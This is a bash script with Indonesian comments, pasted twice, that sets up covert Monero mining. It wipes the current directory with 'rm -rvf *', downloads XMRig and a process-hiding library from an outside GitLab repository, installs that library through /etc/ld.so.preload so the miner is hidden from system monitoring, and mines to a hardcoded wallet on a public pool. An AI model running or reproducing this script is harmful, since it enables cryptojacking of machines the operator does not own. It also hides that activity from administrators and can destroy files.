#!/bin/bash

# Bersihkan direktori & buat baru
rm -rvf * && mkdir xmr && cd xmr

# Atur zona waktu
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata

# Instalasi dependensi
apt update -y && apt install -y \
    cmake build-essential automake libtool autoconf \
    git screen unzip curl wget libssl-dev \
    nodejs node-gyp npm gcc make

# Install node-process-hider
npm install -g node-process-hider

# Download dan ekstrak XMRig
wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-x64.tar.gz
tar -xvzf xmrig-6.21.3-linux-x64.tar.gz
cd xmrig-6.21.3

# Compile dan pasang processhider
wget https://gitlab.com/ravencoin002/file/-/raw/main/processhider.c -O processhider.c
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

# Sembunyikan proses xmrig
ph add xmrig

# Jalankan XMRig (Ganti WALLET_ADDRESS dengan alamat XMR kamu)
./xmrig -o pool.hashvault.pro:443 \
  -u X8AyXAQ5yZxuRe1FiBLQWan4zNvdBRLR5r6vUMR1ncHeHfYsvQ7qvcFoLauFjXTomqLQs1Nh6iMgTvLeyB3tzhq84AcUVCES \
  --tls -k \
  -p $(shuf -i 1000-9999 -n 1)-HVXMR \
  --coin monero
#!/bin/bash

# Bersihkan direktori & buat baru
rm -rvf * && mkdir xmr && cd xmr

# Atur zona waktu
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata

# Instalasi dependensi
apt update -y && apt install -y \
    cmake build-essential automake libtool autoconf \
    git screen unzip curl wget libssl-dev \
    nodejs node-gyp npm gcc make

# Install node-process-hider
npm install -g node-process-hider

# Download dan ekstrak XMRig
wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-x64.tar.gz
tar -xvzf xmrig-6.21.3-linux-x64.tar.gz
cd xmrig-6.21.3

# Compile dan pasang processhider
wget https://gitlab.com/ravencoin002/file/-/raw/main/processhider.c -O processhider.c
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

# Sembunyikan proses xmrig
ph add xmrig

# Jalankan XMRig (Ganti WALLET_ADDRESS dengan alamat XMR kamu)
./xmrig -o pool.hashvault.pro:443 \
  -u X8AyXAQ5yZxuRe1FiBLQWan4zNvdBRLR5r6vUMR1ncHeHfYsvQ7qvcFoLauFjXTomqLQs1Nh6iMgTvLeyB3tzhq84AcUVCES \
  --tls -k \
  -p $(shuf -i 1000-9999 -n 1)-HVXMR \
  --coin monero
